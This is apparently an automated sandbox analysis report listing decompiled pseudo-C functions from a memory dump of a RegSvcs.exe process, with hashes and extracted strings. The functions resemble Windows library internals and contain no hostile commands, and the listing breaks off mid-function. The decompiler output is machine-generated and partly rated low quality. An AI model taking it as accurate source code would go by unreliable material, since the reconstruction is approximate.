                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 509d8f2d6e4356fa9667979c6dbb01b08b2322e71f1527a9eac31b0e95c6eb0e
                                          • Instruction ID: 82501cd2a37f6f20d221ba4c4670d2845354f33e0bdead2b7192f1c99b513368
                                          • Opcode Fuzzy Hash: 509d8f2d6e4356fa9667979c6dbb01b08b2322e71f1527a9eac31b0e95c6eb0e
                                          • Instruction Fuzzy Hash: E8517D71304382DBD325DF28D984B1BBBE9EBC4B18F04092CFA9697691D671EC49C762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0132F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				char* _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v44;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				intOrPtr _v72;
                                          				void* _t51;
                                          				void* _t58;
                                          				signed short _t82;
                                          				short _t84;
                                          				signed int _t91;
                                          				signed int _t100;
                                          				signed short* _t103;
                                          				void* _t108;
                                          				intOrPtr* _t109;
                                          
                                          				_t103 = __ecx;
                                          				_t82 = __edx;
                                          				_t51 = E01314120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                          				if(_t51 >= 0) {
                                          					_push(0x21);
                                          					_push(3);
                                          					_v56 =  *0x7ffe02dc;
                                          					_v20 =  &_v52;
                                          					_push( &_v44);
                                          					_v28 = 0x18;
                                          					_push( &_v28);
                                          					_push(0x100020);
                                          					_v24 = 0;
                                          					_push( &_v60);
                                          					_v16 = 0x40;
                                          					_v12 = 0;
                                          					_v8 = 0;
                                          					_t58 = E01339830();
                                          					_t87 =  *[fs:0x30];
                                          					_t108 = _t58;
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                          					if(_t108 < 0) {
                                          						L11:
                                          						_t51 = _t108;
                                          					} else {
                                          						_push(4);
                                          						_push(8);
                                          						_push( &_v36);
                                          						_push( &_v44);
                                          						_push(_v60);
                                          						_t108 = E01339990();
                                          						if(_t108 < 0) {
                                          							L10:
                                          							_push(_v60);
                                          							E013395D0();
                                          							goto L11;
                                          						} else {
                                          							_t109 = L01314620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                          							if(_t109 == 0) {
                                          								_t108 = 0xc0000017;
                                          								goto L10;
                                          							} else {
                                          								_t21 = _t109 + 0x18; // 0x18
                                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                          								 *_t109 = 1;
                                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                          								 *(_t109 + 0xe) = _t82;
                                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                          								E0133F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                                          								_t91 =  *_t103 & 0x0000ffff;
                                          								_t100 = _t91 & 0xfffffffe;
                                          								_t84 = 0x5c;
                                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                          										_push(_v60);
                                          										E013395D0();
                                          										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                          										_t51 = 0xc0000106;
                                          									} else {
                                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                          										goto L5;
                                          									}
                                          								} else {
                                          									L5:
                                          									 *_a4 = _t109;
                                          									_t51 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t51;
                                          			}


























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: d2f0875c4ce64916c3d4e20c30301604b43b42c965b1b5f9d15bc6cb5752dd8c
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 3F518D716047119FD321DF19C840A6BBBF8FF98718F108A2DFA9587690E7B4E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E01373540(intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				char _v352;
                                          				char _v1072;
                                          				intOrPtr _v1140;
                                          				intOrPtr _v1148;
                                          				char _v1152;
                                          				char _v1156;
                                          				char _v1160;
                                          				char _v1164;
                                          				char _v1168;
                                          				char* _v1172;
                                          				short _v1174;
                                          				char _v1176;
                                          				char _v1180;
                                          				char _v1192;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				short _t41;
                                          				short _t42;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				signed int _t82;
                                          				void* _t83;
                                          
                                          				_v12 =  *0x13ed360 ^ _t82;
                                          				_t41 = 0x14;
                                          				_v1176 = _t41;
                                          				_t42 = 0x16;
                                          				_v1174 = _t42;
                                          				_v1164 = 0x100;
                                          				_v1172 = L"BinaryHash";
                                          				_t81 = E01330BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                          				if(_t81 < 0) {
                                          					L11:
                                          					_t75 = _t81;
                                          					E01373706(0, _t81, _t79, _t80);
                                          					L12:
                                          					if(_a4 != 0xc000047f) {
                                          						E0133FA60( &_v1152, 0, 0x50);
                                          						_v1152 = 0x60c201e;
                                          						_v1148 = 1;
                                          						_v1140 = E01373540;
                                          						E0133FA60( &_v1072, 0, 0x2cc);
                                          						_push( &_v1072);
                                          						E0134DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                          						E01380C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                          						_push(_v1152);
                                          						_push(0xffffffff);
                                          						E013397C0();
                                          					}
                                          					return E0133B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                          				}
                                          				_t79 =  &_v352;
                                          				_t81 = E01373971(0, _a4,  &_v352,  &_v1156);
                                          				if(_t81 < 0) {
                                          					goto L11;
                                          				}
                                          				_t75 = _v1156;
                                          				_t79 =  &_v1160;
                                          				_t81 = E01373884(_v1156,  &_v1160,  &_v1168);
                                          				if(_t81 >= 0) {
                                          					_t80 = _v1160;
                                          					E0133FA60( &_v96, 0, 0x50);
                                          					_t83 = _t83 + 0xc;
                                          					_push( &_v1180);
                                          					_push(0x50);
                                          					_push( &_v96);
                                          					_push(2);
                                          					_push( &_v1176);
                                          					_push(_v1156);
                                          					_t81 = E01339650();
                                          					if(_t81 >= 0) {
                                          						if(_v92 != 3 || _v88 == 0) {
                                          							_t81 = 0xc000090b;
                                          						}
                                          						if(_t81 >= 0) {
                                          							_t75 = _a4;
                                          							_t79 =  &_v352;
                                          							E01373787(_a4,  &_v352, _t80);
                                          						}
                                          					}
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                          				}
                                          				_push(_v1156);
                                          				E013395D0();
                                          				if(_t81 >= 0) {
                                          					goto L12;
                                          				} else {
                                          					goto L11;
                                          				}
                                          			}
































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 0f2c9ee91affb6ea4b390fac063b272cfccbc01bc318a684882fa4824fcbc0bd
                                          • Instruction ID: 9512a2ea6a4825a6324f950164c36e6087ac5e3b8056288131f68252e6b373cc
                                          • Opcode Fuzzy Hash: 0f2c9ee91affb6ea4b390fac063b272cfccbc01bc318a684882fa4824fcbc0bd
                                          • Instruction Fuzzy Hash: B74177B1D0052D9BDB21DA54CC80FEEB77CAB4472CF0045A5EA08AB240DB349E88DF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E013C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				char _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* _t35;
                                          				signed int _t42;
                                          				char* _t48;
                                          				signed int _t59;
                                          				signed char _t61;
                                          				signed int* _t79;
                                          				void* _t88;
                                          
                                          				_v28 = __edx;
                                          				_t79 = __ecx;
                                          				if(E013C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                          					L13:
                                          					_t35 = 0;
                                          					L14:
                                          					return _t35;
                                          				}
                                          				_t61 = __ecx[1];
                                          				_t59 = __ecx[0xf];
                                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                          				_v36 = _a8 << 0xc;
                                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                          				asm("sbb esi, esi");
                                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                          				if(_t42 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t59);
                                          					_push(0xffffffff);
                                          					if(E01339730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                          						_push(_t61);
                                          						E013BA80D(_t59, 1, _v20, 0);
                                          						_t88 = 4;
                                          					}
                                          				}
                                          				_t35 = E013BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                          				if(_t35 < 0) {
                                          					goto L14;
                                          				}
                                          				E013C1293(_t79, _v40, E013C07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                          				if(E01317D50() == 0) {
                                          					_t48 = 0x7ffe0380;
                                          				} else {
                                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          					E013B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                          				}
                                          				goto L13;
                                          			}


















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: e429f1005adb4f848361513d93bd7ed81abd2415cc51abf7a9fbac713023e95c
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: DA310832200345ABE714DE68CC85F977BD9EBC4B68F144129FA54DB680D770ED14CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E01373884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				char* _v20;
                                          				short _v22;
                                          				char _v24;
                                          				intOrPtr _t38;
                                          				short _t40;
                                          				short _t41;
                                          				void* _t44;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          
                                          				_v16 = __edx;
                                          				_t40 = 0x14;
                                          				_v24 = _t40;
                                          				_t41 = 0x16;
                                          				_v22 = _t41;
                                          				_t38 = 0;
                                          				_v12 = __ecx;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(2);
                                          				_t43 =  &_v24;
                                          				_v20 = L"BinaryName";
                                          				_push( &_v24);
                                          				_push(__ecx);
                                          				_t47 = 0;
                                          				_t48 = E01339650();
                                          				if(_t48 >= 0) {
                                          					_t48 = 0xc000090b;
                                          				}
                                          				if(_t48 != 0xc0000023) {
                                          					_t44 = 0;
                                          					L13:
                                          					if(_t48 < 0) {
                                          						L16:
                                          						if(_t47 != 0) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                          						}
                                          						L18:
                                          						return _t48;
                                          					}
                                          					 *_v16 = _t38;
                                          					 *_a4 = _t47;
                                          					goto L18;
                                          				}
                                          				_t47 = L01314620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				if(_t47 != 0) {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t47);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(_v12);
                                          					_t48 = E01339650();
                                          					if(_t48 < 0) {
                                          						_t44 = 0;
                                          						goto L16;
                                          					}
                                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                          						_t48 = 0xc000090b;
                                          					}
                                          					_t44 = 0;
                                          					if(_t48 < 0) {
                                          						goto L16;
                                          					} else {
                                          						_t17 = _t47 + 0xc; // 0xc
                                          						_t38 = _t17;
                                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                          							_t48 = 0xc000090b;
                                          						}
                                          						goto L13;
                                          					}
                                          				}
                                          				_t48 = _t48 + 0xfffffff4;
                                          				goto L18;
                                          			}
















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 3dbd42ca2e91efd755a79d118df2c510cbcdaa226a93b2d4d79954e04830905a
                                          • Instruction ID: b51c4349d570e939762d504d14e31fd3bbeb380ccc817f7cbad875bb02003f88
                                          • Opcode Fuzzy Hash: 3dbd42ca2e91efd755a79d118df2c510cbcdaa226a93b2d4d79954e04830905a
                                          • Instruction Fuzzy Hash: 5231037290150AFFEB25DA5CC945FBBBBB8FF81B28F014169E914A7280D7349E00D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 33%
                                          			E0132D294(void* __ecx, char __edx, void* __eflags) {
                                          				signed int _v8;
                                          				char _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				intOrPtr _v64;
                                          				char* _v68;
                                          				intOrPtr _v72;
                                          				char _v76;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				char _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t35;
                                          				char _t38;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int _t52;
                                          				void* _t53;
                                          				void* _t55;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t64;
                                          				signed int _t65;
                                          				signed int _t66;
                                          
                                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x13ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                          				_v105 = __edx;
                                          				_push( &_v92);
                                          				_t52 = 0;
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v104);
                                          				_push(0);
                                          				_t59 = __ecx;
                                          				_t55 = 2;
                                          				if(E01314120(_t55, __ecx) < 0) {
                                          					_t35 = 0;
                                          					L8:
                                          					_pop(_t61);
                                          					_pop(_t64);
                                          					_pop(_t53);
                                          					return E0133B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                          				}
                                          				_v96 = _v100;
                                          				_t38 = _v92;
                                          				if(_t38 != 0) {
                                          					_v104 = _t38;
                                          					_v100 = _v88;
                                          					_t40 = _v84;
                                          				} else {
                                          					_t40 = 0;
                                          				}
                                          				_v72 = _t40;
                                          				_v68 =  &_v104;
                                          				_push( &_v52);
                                          				_v76 = 0x18;
                                          				_push( &_v76);
                                          				_v64 = 0x40;
                                          				_v60 = _t52;
                                          				_v56 = _t52;
                                          				_t44 = E013398D0();
                                          				_t62 = _v88;
                                          				_t65 = _t44;
                                          				if(_t62 != 0) {
                                          					asm("lock xadd [edi], eax");
                                          					if((_t44 | 0xffffffff) != 0) {
                                          						goto L4;
                                          					}
                                          					_push( *((intOrPtr*)(_t62 + 4)));
                                          					E013395D0();
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                          					if(_t65 >= 0) {
                                          						_t52 = 1;
                                          					} else {
                                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                          						}
                                          					}
                                          					_t35 = _t52;
                                          					goto L8;
                                          				}
                                          			}


































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 5101cd4958cf86a672df27d1f1595bb19b832ad6b408a7d5e9431ea7ace97433
                                          • Instruction ID: 176ed93c526a30435c7f3eef462fe5b65d660f79e3a2a01ae4b172866f18f1bc
                                          • Opcode Fuzzy Hash: 5101cd4958cf86a672df27d1f1595bb19b832ad6b408a7d5e9431ea7ace97433
                                          • Instruction Fuzzy Hash: 6E318DB2508315DFD321EF68C980A6BBBE8FBD9758F00092EFA9493650D634DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E01301B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                          				intOrPtr _v8;
                                          				char _v16;
                                          				intOrPtr* _t26;
                                          				intOrPtr _t29;
                                          				void* _t30;
                                          				signed int _t31;
                                          
                                          				_t27 = __ecx;
                                          				_t29 = __edx;
                                          				_t31 = 0;
                                          				_v8 = __edx;
                                          				if(__edx == 0) {
                                          					L18:
                                          					_t30 = 0xc000000d;
                                          					goto L12;
                                          				} else {
                                          					_t26 = _a4;
                                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                          						goto L18;
                                          					} else {
                                          						E0133BB40(__ecx,  &_v16, __ecx);
                                          						_push(_t26);
                                          						_push(0);
                                          						_push(0);
                                          						_push(_t29);
                                          						_push( &_v16);
                                          						_t30 = E0133A9B0();
                                          						if(_t30 >= 0) {
                                          							_t19 =  *_t26;
                                          							if( *_t26 != 0) {
                                          								goto L7;
                                          							} else {
                                          								 *_a8 =  *_a8 & 0;
                                          							}
                                          						} else {
                                          							if(_t30 != 0xc0000023) {
                                          								L9:
                                          								_push(_t26);
                                          								_push( *_t26);
                                          								_push(_t31);
                                          								_push(_v8);
                                          								_push( &_v16);
                                          								_t30 = E0133A9B0();
                                          								if(_t30 < 0) {
                                          									L12:
                                          									if(_t31 != 0) {
                                          										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                          									}
                                          								} else {
                                          									 *_a8 = _t31;
                                          								}
                                          							} else {
                                          								_t19 =  *_t26;
                                          								if( *_t26 == 0) {
                                          									_t31 = 0;
                                          								} else {
                                          									L7:
                                          									_t31 = L01314620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                          								}
                                          								if(_t31 == 0) {
                                          									_t30 = 0xc0000017;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t30;
                                          			}










                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: ca8eeab30e7c8bce34fd109a7502aa49ed23a55c61d9503dbd337d8ea77e6565
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: E321C27A901229ABDF23DA5D8890F6BBBEDAF81B58F064425FE049B250D630DD0097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0131F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                          				intOrPtr _t13;
                                          				intOrPtr _t14;
                                          				signed int _t16;
                                          				signed char _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t21;
                                          				intOrPtr _t23;
                                          				intOrPtr* _t25;
                                          
                                          				_t25 = _a8;
                                          				_t17 = __ecx;
                                          				if(_t25 == 0) {
                                          					_t19 = 0xc00000f2;
                                          					L8:
                                          					return _t19;
                                          				}
                                          				if((__ecx & 0xfffffffe) != 0) {
                                          					_t19 = 0xc00000ef;
                                          					goto L8;
                                          				}
                                          				_t19 = 0;
                                          				 *_t25 = 0;
                                          				_t21 = 0;
                                          				_t23 = "Actx ";
                                          				if(__edx != 0) {
                                          					if(__edx == 0xfffffffc) {
                                          						L21:
                                          						_t21 = 0x200;
                                          						L5:
                                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                          						 *_t25 = _t13;
                                          						L6:
                                          						if(_t13 == 0) {
                                          							if((_t17 & 0x00000001) != 0) {
                                          								 *_t25 = _t23;
                                          							}
                                          						}
                                          						L7:
                                          						goto L8;
                                          					}
                                          					if(__edx == 0xfffffffd) {
                                          						 *_t25 = _t23;
                                          						_t13 = _t23;
                                          						goto L6;
                                          					}
                                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                          					 *_t25 = _t13;
                                          					L14:
                                          					if(_t21 == 0) {
                                          						goto L6;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t14 = _a4;
                                          				if(_t14 != 0) {
                                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                          					if(_t16 <= 1) {
                                          						_t21 = 0x1f8;
                                          						_t13 = 0;
                                          						goto L14;
                                          					}
                                          					if(_t16 == 2) {
                                          						goto L21;
                                          					}
                                          					if(_t16 != 4) {
                                          						_t19 = 0xc00000f0;
                                          						goto L7;
                                          					}
                                          					_t13 = 0;
                                          					goto L6;
                                          				} else {
                                          					_t21 = 0x1f8;
                                          					goto L5;
                                          				}
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 1c6d46068ec5d10b53eeddce244435a80570e7d5d0445d6932b57cb93c41edf0
                                          • Instruction ID: 2081fab735b623e4563084c373d1bc78d5ded229fdd8266cd06731fd0d9572aa
                                          • Opcode Fuzzy Hash: 1c6d46068ec5d10b53eeddce244435a80570e7d5d0445d6932b57cb93c41edf0
                                          • Instruction Fuzzy Hash: B91108347047068BF72D4E1CC590736769EEB852ECF24453AE462CB7A9D770C8098340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E013A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				void* _t41;
                                          
                                          				_t40 = __esi;
                                          				_t39 = __edi;
                                          				_t38 = __edx;
                                          				_t35 = __ecx;
                                          				_t34 = __ebx;
                                          				_push(0x74);
                                          				_push(0x13d0d50);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                          					E01385720(0x65, 0, "Critical error detected %lx\n", _t35);
                                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                          						asm("int3");
                                          						 *(_t41 - 4) = 0xfffffffe;
                                          					}
                                          				}
                                          				 *(_t41 - 4) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                          				 *((intOrPtr*)(_t41 - 0x64)) = E0134DEF0;
                                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                          				_push(_t41 - 0x70);
                                          				E0134DEF0(1, _t38);
                                          				 *(_t41 - 4) = 0xfffffffe;
                                          				return E0134D130(_t34, _t39, _t40);
                                          			}






                                          Strings
                                          • Critical error detected %lx, xrefs: 013A8E21
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: 8170e0756c058a7dd07e5e9c523f74fa9095695f4793e8e5caff950016086781
                                          • Instruction ID: f0ae6ae3b5a50162fb3fb1a23aed39c8558980af77edc868681985d95bcef8db
                                          • Opcode Fuzzy Hash: 8170e0756c058a7dd07e5e9c523f74fa9095695f4793e8e5caff950016086781
                                          • Instruction Fuzzy Hash: C1113975D15348EBDF29DFA88505B9CBBB0EB24319F60425EE669AB282D3351601CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E012FF900(signed int _a4, signed int _a8) {
                                          				signed char _v5;
                                          				signed char _v6;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed char _t285;
                                          				signed int _t289;
                                          				signed char _t292;
                                          				signed int _t293;
                                          				signed char _t295;
                                          				signed int _t300;
